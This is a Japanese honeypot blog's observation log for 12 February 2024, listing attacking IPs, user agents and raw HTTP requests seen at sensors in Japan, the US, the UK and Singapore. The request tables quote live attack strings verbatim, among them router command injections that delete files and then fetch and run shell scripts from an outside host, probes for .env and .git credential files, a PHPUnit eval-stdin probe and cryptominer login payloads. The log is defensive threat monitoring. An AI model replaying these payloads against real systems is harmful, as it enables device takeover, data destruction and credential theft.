2024/02/12 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2024/02/12分です。

特徴

共通

Spring Bootの脆弱性を狙うアクセス
CensysInspectによるスキャン行為
zgrabによるスキャン行為
/.envへのスキャン行為
Apache Tomcatへのスキャン行為

Location:JP

GPONルータの脆弱性を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為
/.gitへのスキャン行為
configファイルへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:US

D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス
141.98.7.179に関する不正通信

を確認しました。

Location:UK

D-link製品の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス
curlによるスキャン行為
.jsへのスキャン行為
phpMyAdminへのスキャン行為

を確認しました。

Location:SG

Cisco Unified Operations Managerの脆弱性(CVE-2011-0966)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Easy Hosting Control Panelの脆弱性を狙うアクセス
FCKEditorの脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Joomla!の脆弱性を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
TP-Link製品の脆弱性(CVE-2023-1389)を狙うアクセス
FAST-WebCrawlerによるスキャン行為
Nmap Scripting Engineによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
.sqlへのスキャン行為
/.gitへのスキャン行為
WordPressへのスキャン行為
configファイルへのスキャン行為
phpMyAdminへのスキャン行為
Gh0stRATのような動き

を確認しました。

他

アクセス数推移

JP：総アクセス数：207 (前日比：-1748)
US：総アクセス数：96 (前日比：38)
UK：総アクセス数：65 (前日比：-173)
SG：総アクセス数：2279 (前日比：2183)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	13.43.217.175	United States
1	20.3.241.148	United States
1	45.56.108.128	United States
1	54.212.194.194	United States
1	64.62.197.20	United States
2	64.62.197.23	United States
1	69.164.217.74	United States
1	81.94.156.139	Russia
1	89.190.156.234	United States
4	91.92.245.64	Bulgaria
2	91.92.245.67	Bulgaria
4	101.32.192.203	Singapore
1	104.131.144.38	United States
1	104.192.0.61	United States
1	107.170.234.42	United States
6	118.194.250.22	Hong Kong
42	124.222.51.236	China
15	135.125.244.48	France
1	143.110.160.134	United States
2	157.245.69.32	United States
2	165.154.129.74	Hong Kong
1	167.248.133.186	United States
13	170.64.161.251	United States
11	185.91.69.110	Spain
3	185.254.196.173	Ukraine
2	185.254.196.186	Ukraine
2	205.210.31.24	United States
71	209.160.115.2	United States
12	222.186.13.132	China

UserAgent一覧

件数	UserAgent
70	`-`
2	`Go-http-client/1.1`
71	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15`
3	`Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36`
4	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36`
5	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 7_2_1; Win64; x64) AppleWebKit/572.47 (KHTML, like Gecko) Chrome/72.0.321 Safari/537.36`
20	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/566.40 (KHTML, like Gecko) Chrome/82.0.2805 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/569.47 (KHTML, like Gecko) Chrome/76.0.64 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; ; NCLIENT50_AAPCDA5841E333)`
4	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`Python-urllib/3.10`
1	`curl/8.1.2`
4	`python-requests/2.28.2`
1	`python-requests/2.31.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01\x9c\x01`
2		`\x16\x03\x01\x01\xa6\x01`
1		`\x16\x03\x01\x01\xb3\x01`
1		`\x16\x03\x01\x01\xfa\x01`
1		`\x16\x03\x01\x02`
8		`\x16\x03\x01`
1		`\x16\x03\x02\x01\x99\x01`
1		`\x16\x03\x03\x01G\x01`
1		`\x16\x03\x03\x01U\x01`
1		`\x16\x03\x03\x01\x98\x01`
2		`\x16\x03\x03\x01\xa4\x01`
1		`\x80\x18\xdd\tE\xee\xbaO`\x10\x04\xb0\xb3\xc1`
1		`\x9c\x8eP\xd2.\xe3\x17\x80`\x18\x04\xb0Nw`
1		`{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"46QaLnmcwpLTeVrh5SUCAEf3TGyvXppbN2KoAroXwsbReFDtZrYQRGZZF5LAZxbBNU1n3JLkDuXqGVvnVqB7bTXHDfGygen\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3`	(Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}\n
1		`{\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"igwrcvap\",\"params\":[\"0x392bc8afcd7c815ea5c5771127e6c9ff2457d8eb\",\"x\"],\"jsonrpc\":\"2.0\"}\n`
1		`{\"id\":`	1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}\n
1		`{\"id\":`	1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]}\n
1	CONNECT	`api6[.]ipify[.]org:443`	HTTP/1.1
1	CONNECT	`api[.]ipify[.]org:443`	HTTP/1.1
1	CONNECT	`google[.]com:443`	HTTP/1.1
1	GET	`/.env.development`	HTTP/1.1
1	GET	`/.env.dist`	HTTP/1.1
1	GET	`/.env.old`	HTTP/1.1
1	GET	`/.env.prod`	HTTP/1.1
1	GET	`/.env.production`	HTTP/1.1
1	GET	`/.env.project`	HTTP/1.1
1	GET	`/.env.save`	HTTP/1.1
22	GET	`/.env`	HTTP/1.1
1	GET	`/.git/HEAD`	HTTP/1.1
5	GET	`/.git/config`	HTTP/1.1
1	GET	`/.json`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?phpinfo=1`	HTTP/1.1
1	GET	`/Pages/log/`	HTTP/1.1
1	GET	`/SiteLoader`	HTTP/1.1
1	GET	`/Temporary_Listen_Addresses`	HTTP/1.1
1	GET	`/WuEL`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/a`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin-app/.env`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/application/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/axis2-admin/`	HTTP/1.1
1	GET	`/axis2/`	HTTP/1.1
1	GET	`/axis2/axis2-admin/`	HTTP/1.1
1	GET	`/back/.env`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
1	GET	`/cms/.env`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/cp/.env`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/development/.env`	HTTP/1.1
1	GET	`/docker/.env`	HTTP/1.1
1	GET	`/download/file.ext`	HTTP/1.1
1	GET	`/enviroments/.env.production`	HTTP/1.1
1	GET	`/enviroments/.env`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/fedex/.env`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/frontend_dev.php/$`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
2	GET	`/info.php`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/live_env`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/mPlayer`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/phpinfo.php`	HTTP/1.1
1	GET	`/private/.env`	HTTP/1.1
1	GET	`/rest/.env`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/script/.env`	HTTP/1.1
1	GET	`/shared/.env`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/sources/.env`	HTTP/1.1
1	GET	`/system/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/v3/time`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`http[:]//18[.]179[.]20[.]5:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/SQL/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/admin/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/db/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/dbadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysql-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysqladmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/php/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/sqlweb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/webadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/webdb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//18[.]179[.]20[.]5:80/websql/scripts/setup.php`	HTTP/1.0
1	GET	`stager64`	HTTP/1.1
4	HEAD	`/Core/Skin/Login.aspx`	HTTP/1.1
1	OPTIONS	`/ RTSP/1.0`
1	POST	`/.env.development`	HTTP/1.1
1	POST	`/.env.dist`	HTTP/1.1
1	POST	`/.env.old`	HTTP/1.1
1	POST	`/.env.prod`	HTTP/1.1
1	POST	`/.env.production`	HTTP/1.1
1	POST	`/.env.project`	HTTP/1.1
1	POST	`/.env.save`	HTTP/1.1
1	POST	`/.env`	HTTP/1.1
1	POST	`/admin-app/.env`	HTTP/1.1
1	POST	`/api/.env`	HTTP/1.1
1	POST	`/app/.env`	HTTP/1.1
1	POST	`/application/.env`	HTTP/1.1
1	POST	`/apps/.env`	HTTP/1.1
1	POST	`/back/.env`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cms/.env`	HTTP/1.1
1	POST	`/core/.env`	HTTP/1.1
1	POST	`/cp/.env`	HTTP/1.1
1	POST	`/development/.env`	HTTP/1.1
1	POST	`/docker/.env`	HTTP/1.1
1	POST	`/enviroments/.env.production`	HTTP/1.1
1	POST	`/enviroments/.env`	HTTP/1.1
1	POST	`/fedex/.env`	HTTP/1.1
1	POST	`/laravel/.env`	HTTP/1.1
1	POST	`/live_env`	HTTP/1.1
1	POST	`/local/.env`	HTTP/1.1
1	POST	`/private/.env`	HTTP/1.1
1	POST	`/rest/.env`	HTTP/1.1
1	POST	`/script/.env`	HTTP/1.1
1	POST	`/shared/.env`	HTTP/1.1
1	POST	`/sources/.env`	HTTP/1.1
1	POST	`/system/.env`	HTTP/1.1
1	t3	`12.1.2\n`

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	8.137.106.178	Singapore
2	13.40.25.161	United States
21	18.130.241.73	United States
1	20.3.241.148	United States
3	20.102.248.51	United States
1	23.227.148.139	United States
1	31.220.3.140	Germany
1	38.68.48.24	United States
2	45.79.172.21	United States
1	54.37.79.75	France
1	64.62.197.142	United States
1	65.49.1.108	United States
1	65.49.1.115	United States
1	65.49.1.117	United States
4	71.6.167.142	United States
2	83.97.73.245	Germany
1	89.190.156.234	United States
2	90.151.171.106	Russia
2	91.92.247.104	Bulgaria
3	91.92.247.159	Bulgaria
9	95.214.235.169	Ukraine
3	103.56.17.252	China
1	120.211.183.3	China
1	123.178.210.101	China
1	139.59.101.104	Singapore
1	141.98.7.179	Bulgaria
1	159.65.91.127	United States
2	162.142.125.213	United States
1	162.243.143.39	United States
2	167.94.138.34	United States
2	170.64.134.120	United States
2	172.105.128.11	United States
2	185.161.248.148	United Kingdom
6	185.224.128.10	Netherlands
1	192.241.237.44	United States
1	193.201.9.47	Russia
1	194.165.16.10	Panama
1	198.199.103.75	United States
2	198.235.24.5	United States
2	198.235.24.221	United States
2	205.210.31.49	United States

UserAgent一覧

件数	UserAgent
9	`'Cloud mapping experiment. Contact research@pdrlabs.net'`
39	`-`
4	`Go-http-client/1.1`
1	`Mozila/5.0`
3	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
3	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from) Z73802194750Q1`
1	`Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0 (+https[:]//best-proxies.ru/faq/#from)`
1	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.115 Safari/537.36`
13	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
2	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
4	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`
1	`Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`(\x86\b]\xa8\xc2i)`\x18\x04\xb0\xb1=`
1		`-`
1		`MGLNDD_34.68.118.83_80\n`
3		`\x03`
1		`\x16\x03\x01\x01\xfb\x01`
22		`\x16\x03\x01`
1		`\xf5\xbfp\x98}=\xc7\x85`\x10\x04\xb0O?`
1		``
1	CONNECT	`checkip[.]amazonaws[.]com:443`	HTTP/1.1
1	GET	`/+CSCOE+/logon.html`	HTTP/1.1
16	GET	`/.env`	HTTP/1.1
1	GET	`/.well-known/security.txt`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Pages/log/`	HTTP/1.1
1	GET	`/Phpinfo/profiler`	HTTP/1.1
1	GET	`/RDWeb/Pages`	HTTP/1.1
1	GET	`/Temporary_Listen_Addresses`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/admin/index.html`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=admin&psd=admin`	HTTP/1.0
2	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cgi-bin/login.cgi`	HTTP/1.1
4	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192[.]3[.]152[.]183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)`	HTTP/1.1
1	GET	`/doc/index.html`	HTTP/1.1
8	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/goform/webRead/open/?path=\|rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192[.]3[.]152[.]183%2Fbruh.sh%3B%20chmod%20777%20bruh.sh%3B%20.%2Fbruh.sh`	HTTP/1.1
1	GET	`/index.html`	HTTP/1.1
1	GET	`/login.jsp`	HTTP/1.1
1	GET	`/logon.htm`	HTTP/1.1
1	GET	`/manage/account/login`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/sendgrid/.env`	HTTP/1.1
1	GET	`/sitemap.xml`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`/wp-content/`	HTTP/1.1
1	GET	`board.cgi?cmd=rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192[.]3[.]152[.]183%2Fwget1.sh%3B%20chmod%20777%20wget1.sh%3B%20.%2Fwget1.sh`	HTTP/1.1
1	GET	`http[:]//141[.]98[.]7[.]179/a.php?pro=34[.]68[.]118[.]83:80`	HTTP/1.1
1	GET	`http[:]//checkip[.]amazonaws[.]com?Z73802194750Q1`	HTTP/1.1
1	HEAD	`/.env`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.1
1	POST	`/boaform/admin/formLogin`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	5.196.102.76	France
1	18.133.181.228	United States
2	18.135.103.88	United States
1	31.220.3.140	Germany
1	42.231.220.24	China
1	45.79.181.223	United States
1	45.227.254.49	Belize
1	64.62.197.93	United States
1	64.62.197.94	United States
1	64.62.197.102	United States
1	65.49.1.12	United States
1	66.45.237.154	United States
1	81.94.156.139	Russia
2	83.97.73.245	Germany
8	95.214.235.169	Ukraine
1	103.67.163.199	private ip address
1	117.184.26.242	China
1	117.202.167.43	India
2	128.199.237.61	United Kingdom
1	139.59.101.104	Singapore
1	144.126.238.50	United States
2	146.190.41.214	United States
13	157.245.101.145	United States
1	159.203.224.26	United States
1	161.35.30.182	United States
1	162.251.5.51	United States
2	167.94.138.124	United States
1	172.105.128.11	United States
2	183.136.225.42	China
6	185.224.128.10	Netherlands
1	198.199.107.71	United States
2	198.235.24.19	United States
2	198.235.24.248	United States

UserAgent一覧

件数	UserAgent
20	`-`
3	`Go-http-client/1.1`
1	`Mozila/5.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Safari/605.1.15`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41`
6	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0`
2	`Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE`
8	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
4	`Mozilla/5.0 zgrab/0.x`
4	`Mozilla/5.0`
1	`curl/8.1.2`
1	`python-requests/2.26.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`B\xfb\x14\xdd\x01\xf3\x1b\v`\x10\x04\xb0\xe4D`
1		`\"\xb8\x81\xe80\xad\xf4<`\x10\x04\xb0\xe0\x06`
1		`\x03`
1		`\x16\x03\x01\x01\x04\x01`
1		`\x16\x03\x01\x01\xfc\x01`
10		`\x16\x03\x01`
1		`\xe8\n`
2	CONNECT	`google[.]com:443`	HTTP/1.1
9	GET	`/.env`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Pages/log/`	HTTP/1.1
1	GET	`/Temporary_Listen_Addresses`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/actuator/health`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
2	GET	`/cdn-cgi/trace`	HTTP/1.1
4	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192[.]3[.]152[.]183%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh)`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/goform/webRead/open/?path=\|rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192[.]3[.]152[.]183%2Fbruh.sh%3B%20chmod%20777%20bruh.sh%3B%20.%2Fbruh.sh`	HTTP/1.1
1	GET	`/hello`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/manager/html`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/robots.txt`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
1	GET	`board.cgi?cmd=rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F192[.]3[.]152[.]183%2Fwget1.sh%3B%20chmod%20777%20wget1.sh%3B%20.%2Fwget1.sh`	HTTP/1.1
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	HEAD	`/.env`	HTTP/1.1
1	HEAD	`/robots.txt`	HTTP/1.0
1	POST	`/HNAP1/`	HTTP/1.0
1	POST	`/HNAP1/`	HTTP/1.1
1	PRI	`*`	HTTP/2.0